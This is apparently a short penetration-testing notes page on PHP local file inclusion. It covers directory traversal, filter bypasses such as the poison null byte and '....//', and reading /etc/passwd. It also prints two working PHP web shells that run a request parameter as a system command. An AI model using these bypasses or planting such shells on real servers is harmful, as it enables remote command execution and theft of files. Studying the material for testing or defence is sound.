Local file inclusion (LFI) attacks

LFI vulnerabilities are most common in PHP, but are sometimes found in other languages/frameworks.

Since web servers are typically serving content from /var/www, /var/www/srv, or an immediate subdirectory for virtual hosts, you generally need to use ../../, ../../../, or ../../../../ to reach /.

PHP tricks

PHP local file inclusion attacks
For PHP < 5.3.4, you can use the poison null byte to defeat simple path filters or situations where the developer is appending some suffix to user input to try to prevent local file inclusion attacks.

If the poison null byte doesn’t work, another trick relies on the fact that for some bizarre reason PHP allows files to be referenced with . notation just like directories. In other words, /etc/passwd/. will return the contents of /etc/passwd!

Representing ../ as ....// can bypass filters that replace ../, as PHP search-and-replace only does a single pass through a string (it should be obvious how to extend this if a developer tries to just run a search and replace twice).

RCE
PHP web shell
<?php
	echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";
?>
A slightly spruced-up version of this is available on Kali Linux as /usr/share/webshells/php/simple-backdoor.php.

On space-constrained systems, you can compact this down to just 15 bytes:
<?=`$_GET[1]`?>
Link to original
Link to original

Cardboard Iguana Security

Explorer

Local file inclusion (LFI) attacks

PHP tricks

PHP local file inclusion attacks

RCE

PHP web shell

Graph View

Backlinks